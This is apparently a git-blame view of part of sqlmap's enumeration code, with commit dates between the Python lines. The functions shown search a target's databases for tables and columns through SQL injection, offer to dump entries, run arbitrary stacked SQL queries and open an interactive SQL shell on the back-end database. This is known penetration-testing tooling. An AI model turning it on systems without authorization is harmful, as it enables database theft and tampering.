2011-01-19 02:02:11 +03:00
|
|
|
foundTbl = inject.getValue(query, inband=False, error=False)
|
2010-05-17 00:46:17 +04:00
|
|
|
kb.hintValue = foundTbl
|
2011-03-30 01:54:15 +04:00
|
|
|
foundTbl = safeSQLIdentificatorNaming(foundTbl, True)
|
2010-05-17 00:46:17 +04:00
|
|
|
foundTbls[db].append(foundTbl)
|
|
|
|
|
|
|
|
return foundTbls
|
2010-05-07 17:40:57 +04:00
|
|
|
|
|
|
|
def searchColumn(self):
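# Searches across all databases and tables for columns matching the
# value(s) given with -C, with the same brute-force fallback as
# searchTable(); the findings are finally handed to self.dumpFoundColumn().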
|
2010-12-27 02:50:16 +03:00
|
|
|
bruteForce = False
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "information_schema not available, "
|
2010-05-07 17:40:57 +04:00
|
|
|
errMsg += "back-end DBMS is MySQL < 5.0"
|
2010-12-27 02:50:16 +03:00
|
|
|
bruteForce = True
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.ACCESS):
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "cannot retrieve column names, "
|
2010-12-27 02:50:16 +03:00
|
|
|
errMsg += "back-end DBMS is Access"
|
|
|
|
logger.error(errMsg)
|
|
|
|
bruteForce = True
|
|
|
|
|
|
|
|
if bruteForce:
|
2011-05-22 12:24:13 +04:00
|
|
|
message = "do you want to use common columns existence check? [Y/n/q]"
|
2010-12-27 02:50:16 +03:00
|
|
|
test = readInput(message, default="Y")
|
|
|
|
|
|
|
|
if test[0] in ("n", "N"):
|
|
|
|
return
|
|
|
|
elif test[0] in ("q", "Q"):
|
|
|
|
raise sqlmapUserQuitException
|
|
|
|
else:
|
|
|
|
regex = "|".join(conf.col.split(","))
|
2010-12-27 03:41:16 +03:00
|
|
|
conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS, regex))
|
|
|
|
|
|
|
|
message = "do you want to dump entries? [Y/n] "
|
|
|
|
output = readInput(message, default="Y")
|
|
|
|
|
|
|
|
if output and output[0] not in ("n", "N"):
|
|
|
|
self.dumpAll()
|
|
|
|
|
|
|
|
return
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
rootQuery = queries[Backend.getIdentifiedDbms()].search_column
|
2010-01-09 03:05:00 +03:00
|
|
|
foundCols = {}
|
|
|
|
dbs = {}
|
|
|
|
colList = conf.col.split(",")
|
2010-10-21 17:13:12 +04:00
|
|
|
colCond = rootQuery.inband.condition
|
|
|
|
dbCond = rootQuery.inband.condition2
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-07 17:40:57 +04:00
|
|
|
colConsider, colCondParam = self.likeOrExact("column")
|
2010-01-09 03:05:00 +03:00
|
|
|
|
|
|
|
for column in colList:
|
2011-03-30 01:54:15 +04:00
|
|
|
column = safeSQLIdentificatorNaming(column)
|
2011-03-28 15:01:55 +04:00
|
|
|
|
2010-05-17 00:46:17 +04:00
|
|
|
infoMsg = "searching column"
|
|
|
|
if colConsider == "1":
|
|
|
|
infoMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column)
|
2010-05-17 00:46:17 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
foundCols[column] = {}
|
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
if conf.excludeSysDbs:
|
2010-05-07 17:40:57 +04:00
|
|
|
exclDbsQuery = "".join(" AND '%s' != %s" % (db, dbCond) for db in self.excludeDbsList)
|
2011-04-30 19:29:19 +04:00
|
|
|
infoMsg = "skipping system database%s: %s" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList))
|
2010-01-09 03:05:00 +03:00
|
|
|
logger.info(infoMsg)
|
|
|
|
else:
|
2010-05-07 17:40:57 +04:00
|
|
|
exclDbsQuery = ""
|
2010-01-09 03:05:00 +03:00
|
|
|
|
|
|
|
colQuery = "%s%s" % (colCond, colCondParam)
|
2011-03-30 01:54:15 +04:00
|
|
|
colQuery = colQuery % unsafeSQLIdentificatorNaming(column)
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.inband.query
|
2010-01-09 03:05:00 +03:00
|
|
|
query += colQuery
|
2010-05-07 17:40:57 +04:00
|
|
|
query += exclDbsQuery
|
2011-01-19 02:02:11 +03:00
|
|
|
values = inject.getValue(query, blind=False)
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2011-05-26 12:17:21 +04:00
|
|
|
if not isNoneValue(values):
|
2010-05-25 14:09:35 +04:00
|
|
|
if isinstance(values, basestring):
|
2010-01-09 03:05:00 +03:00
|
|
|
values = [ values ]
|
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
for foundDb, foundTbl in values:
|
2011-03-30 01:54:15 +04:00
|
|
|
foundDb = safeSQLIdentificatorNaming(foundDb)
|
|
|
|
foundTbl = safeSQLIdentificatorNaming(foundTbl, True)
|
2011-03-28 15:01:55 +04:00
|
|
|
|
2011-02-10 14:34:16 +03:00
|
|
|
if foundDb is None or foundTbl is None:
|
|
|
|
continue
|
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
if foundDb not in dbs:
|
|
|
|
dbs[foundDb] = {}
|
|
|
|
|
|
|
|
if foundTbl not in dbs[foundDb]:
|
|
|
|
dbs[foundDb][foundTbl] = {}
|
|
|
|
|
|
|
|
if colConsider == "1":
|
|
|
|
conf.db = foundDb
|
|
|
|
conf.tbl = foundTbl
|
|
|
|
conf.col = column
|
|
|
|
|
|
|
|
self.getColumns(onlyColNames=True)
|
|
|
|
|
|
|
|
dbs[foundDb][foundTbl].update(kb.data.cachedColumns[foundDb][foundTbl])
|
|
|
|
kb.data.cachedColumns = {}
|
|
|
|
else:
|
|
|
|
dbs[foundDb][foundTbl][column] = None
|
|
|
|
|
|
|
|
if foundDb in foundCols[column]:
|
|
|
|
foundCols[column][foundDb].append(foundTbl)
|
|
|
|
else:
|
|
|
|
foundCols[column][foundDb] = [ foundTbl ]
|
2010-01-09 03:05:00 +03:00
|
|
|
else:
|
|
|
|
infoMsg = "fetching number of databases with tables containing column"
|
|
|
|
if colConsider == "1":
|
|
|
|
infoMsg += "s like"
|
|
|
|
infoMsg += " '%s'" % column
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.count
|
2010-01-09 03:05:00 +03:00
|
|
|
query += colQuery
|
2010-05-07 17:40:57 +04:00
|
|
|
query += exclDbsQuery
|
2011-01-19 02:02:11 +03:00
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-12-02 21:57:43 +03:00
|
|
|
if not isNumPosStrValue(count):
|
2011-04-30 17:20:05 +04:00
|
|
|
warnMsg = "no databases have tables containing column"
|
2010-01-09 03:05:00 +03:00
|
|
|
if colConsider == "1":
|
|
|
|
warnMsg += "s like"
|
|
|
|
warnMsg += " '%s'" % column
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
continue
|
|
|
|
|
2010-01-11 16:06:16 +03:00
|
|
|
indexRange = getRange(count)
|
2010-01-09 03:05:00 +03:00
|
|
|
|
|
|
|
for index in indexRange:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.query
|
2010-01-09 03:05:00 +03:00
|
|
|
query += colQuery
|
2010-05-07 17:40:57 +04:00
|
|
|
query += exclDbsQuery
|
2010-01-09 03:05:00 +03:00
|
|
|
query = agent.limitQuery(index, query)
|
2011-01-19 02:02:11 +03:00
|
|
|
db = inject.getValue(query, inband=False, error=False)
|
2011-03-30 01:54:15 +04:00
|
|
|
db = safeSQLIdentificatorNaming(db)
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
if db not in dbs:
|
|
|
|
dbs[db] = {}
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
if db not in foundCols[column]:
|
|
|
|
foundCols[column][db] = []
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
for column, dbData in foundCols.items():
|
|
|
|
colQuery = "%s%s" % (colCond, colCondParam)
|
|
|
|
colQuery = colQuery % column
|
2010-01-10 22:12:54 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
for db in dbData:
|
2011-03-30 01:54:15 +04:00
|
|
|
db = safeSQLIdentificatorNaming(db)
|
2011-03-28 15:01:55 +04:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
infoMsg = "fetching number of tables containing column"
|
|
|
|
if colConsider == "1":
|
|
|
|
infoMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(column), db)
|
2010-05-17 20:16:49 +04:00
|
|
|
logger.info(infoMsg)
|
2010-01-10 22:12:54 +03:00
|
|
|
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.count2
|
2010-01-09 03:05:00 +03:00
|
|
|
query = query % db
|
|
|
|
query += " AND %s" % colQuery
|
2011-01-19 02:02:11 +03:00
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
2010-01-10 22:12:54 +03:00
|
|
|
|
2010-12-02 21:57:43 +03:00
|
|
|
if not isNumPosStrValue(count):
|
2010-05-17 20:16:49 +04:00
|
|
|
warnMsg = "no tables contain column"
|
|
|
|
if colConsider == "1":
|
|
|
|
warnMsg += "s like"
|
|
|
|
warnMsg += " '%s' " % column
|
|
|
|
warnMsg += "in database '%s'" % db
|
|
|
|
logger.warn(warnMsg)
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
continue
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
indexRange = getRange(count)
|
2010-01-10 22:12:54 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
for index in indexRange:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.query2
|
2010-01-09 03:05:00 +03:00
|
|
|
query = query % db
|
|
|
|
query += " AND %s" % colQuery
|
2010-05-17 20:16:49 +04:00
|
|
|
query = agent.limitQuery(index, query)
|
2011-01-19 02:02:11 +03:00
|
|
|
tbl = inject.getValue(query, inband=False, error=False)
|
2010-05-17 20:16:49 +04:00
|
|
|
kb.hintValue = tbl
|
2010-01-10 00:39:10 +03:00
|
|
|
|
2011-03-30 01:54:15 +04:00
|
|
|
tbl = safeSQLIdentificatorNaming(tbl, True)
|
2011-03-28 15:01:55 +04:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
if tbl not in dbs[db]:
|
|
|
|
dbs[db][tbl] = {}
|
2010-01-10 00:39:10 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
if colConsider == "1":
|
|
|
|
conf.db = db
|
|
|
|
conf.tbl = tbl
|
|
|
|
conf.col = column
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
self.getColumns(onlyColNames=True)
|
2010-01-10 00:39:10 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
dbs[db][tbl].update(kb.data.cachedColumns[db][tbl])
|
|
|
|
kb.data.cachedColumns = {}
|
|
|
|
else:
|
|
|
|
dbs[db][tbl][column] = None
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
foundCols[column][db].append(tbl)
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
self.dumpFoundColumn(dbs, foundCols, colConsider)
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-07 17:40:57 +04:00
|
|
|
def search(self):
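# Entry point for --search: dispatches to searchDb(), searchTable() and/or
# searchColumn() depending on which of -D, -T, -C were provided.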
|
|
|
|
if conf.db:
|
2010-05-28 20:43:04 +04:00
|
|
|
conf.dumper.lister("found databases", self.searchDb())
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-05-07 17:40:57 +04:00
|
|
|
if conf.tbl:
|
2010-05-28 20:43:04 +04:00
|
|
|
conf.dumper.dbTables(self.searchTable())
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2008-10-26 20:07:55 +03:00
|
|
|
if conf.col:
|
2010-05-07 17:40:57 +04:00
|
|
|
self.searchColumn()
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-05-07 17:40:57 +04:00
|
|
|
if not conf.db and not conf.tbl and not conf.col:
|
|
|
|
errMsg = "missing parameter, provide -D, -T or -C together "
|
|
|
|
errMsg += "with --search"
|
|
|
|
raise sqlmapMissingMandatoryOptionException, errMsg
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
def sqlQuery(self, query):
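# Runs an arbitrary SQL statement: SELECT-like statements are fetched
# through inject.getValue(), anything else is executed via stacked queries
# (inject.goStacked) when that technique is available; returns the output.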
|
2011-01-21 00:49:06 +03:00
|
|
|
output = None
|
2010-01-05 19:15:31 +03:00
|
|
|
sqlType = None
|
2011-01-21 00:49:06 +03:00
|
|
|
getOutput = None
|
2008-12-19 23:09:46 +03:00
|
|
|
|
|
|
|
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
|
|
|
|
for sqlStatement in sqlStatements:
|
|
|
|
if query.lower().startswith(sqlStatement):
|
|
|
|
sqlType = sqlTitle
|
|
|
|
|
|
|
|
break
|
|
|
|
|
2011-01-21 00:49:06 +03:00
|
|
|
if not self.alwaysRetrieveSqlOutput:
|
|
|
|
message = "do you want to retrieve the SQL statement output? "
|
2011-05-02 01:41:14 +04:00
|
|
|
|
|
|
|
if not sqlType or 'SELECT' in sqlType:
|
|
|
|
message += "[Y/n/a] "
|
|
|
|
getOutput = readInput(message, default="Y")
|
|
|
|
else:
|
|
|
|
message += "[y/N/a] "
|
|
|
|
getOutput = readInput(message, default="N")
|
2011-01-21 00:49:06 +03:00
|
|
|
|
|
|
|
if getOutput in ("a", "A"):
|
|
|
|
self.alwaysRetrieveSqlOutput = True
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2011-01-21 00:49:06 +03:00
|
|
|
if not getOutput or getOutput in ("y", "Y") or self.alwaysRetrieveSqlOutput:
|
2010-03-31 17:52:51 +04:00
|
|
|
infoMsg = "fetching %s query output: '%s'" % (sqlType if sqlType is not None else "SQL", query)
|
2008-12-19 23:48:33 +03:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
output = inject.getValue(query, fromUser=True)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
return output
|
2008-12-19 23:09:46 +03:00
|
|
|
else:
|
2010-12-18 18:57:47 +03:00
|
|
|
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
|
2011-04-30 17:20:05 +04:00
|
|
|
warnMsg = "execution of custom SQL queries is only "
|
2010-10-15 19:37:15 +04:00
|
|
|
warnMsg += "available when stacked queries are supported"
|
2010-09-25 02:09:33 +04:00
|
|
|
logger.warn(warnMsg)
|
2008-12-19 23:48:33 +03:00
|
|
|
return None
|
|
|
|
else:
|
|
|
|
if sqlType:
|
2010-03-31 17:52:51 +04:00
|
|
|
infoMsg = "executing %s query: '%s'" % (sqlType if sqlType is not None else "SQL", query)
|
2008-12-19 23:48:33 +03:00
|
|
|
else:
|
|
|
|
infoMsg = "executing unknown SQL type query: '%s'" % query
|
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2008-12-19 23:48:33 +03:00
|
|
|
inject.goStacked(query)
|
|
|
|
|
|
|
|
infoMsg = "done"
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
output = False
|
|
|
|
|
|
|
|
return output
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
def sqlShell(self):
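# Interactive "sql-shell>" prompt: reads statements from the user and
# prints their output through sqlQuery() until 'x'/'q'/exit/quit is entered.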
|
2011-04-30 17:20:05 +04:00
|
|
|
infoMsg = "calling %s shell. To quit type " % Backend.getIdentifiedDbms()
|
2008-11-12 03:36:50 +03:00
|
|
|
infoMsg += "'x' or 'q' and press ENTER"
|
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
autoCompletion(sqlShell=True)
|
|
|
|
|
|
|
|
while True:
|
|
|
|
query = None
|
|
|
|
|
|
|
|
try:
|
2009-04-22 15:48:07 +04:00
|
|
|
query = raw_input("sql-shell> ")
|
2010-05-28 20:43:04 +04:00
|
|
|
query = utf8decode(query)
|
2008-10-15 19:38:22 +04:00
|
|
|
except KeyboardInterrupt:
|
|
|
|
print
|
|
|
|
errMsg = "user aborted"
|
|
|
|
logger.error(errMsg)
|
|
|
|
except EOFError:
|
|
|
|
print
|
|
|
|
errMsg = "exit"
|
|
|
|
logger.error(errMsg)
|
|
|
|
break
|
|
|
|
|
|
|
|
if not query:
|
|
|
|
continue
|
|
|
|
|
|
|
|
if query.lower() in ( "x", "q", "exit", "quit" ):
|
|
|
|
break
|
|
|
|
|
|
|
|
output = self.sqlQuery(query)
|
|
|
|
|
|
|
|
if output and output != "Quit":
|
2010-05-28 20:43:04 +04:00
|
|
|
conf.dumper.query(query, output)
|
2008-12-19 23:48:33 +03:00
|
|
|
|
2010-01-02 05:02:12 +03:00
|
|
|
elif not output:
|
2008-12-19 23:48:33 +03:00
|
|
|
pass
|
|
|
|
|
2008-10-15 19:38:22 +04:00
|
|
|
elif output != "Quit":
|
2010-10-21 02:09:03 +04:00
|
|
|
dataToStdout("No output\n")
|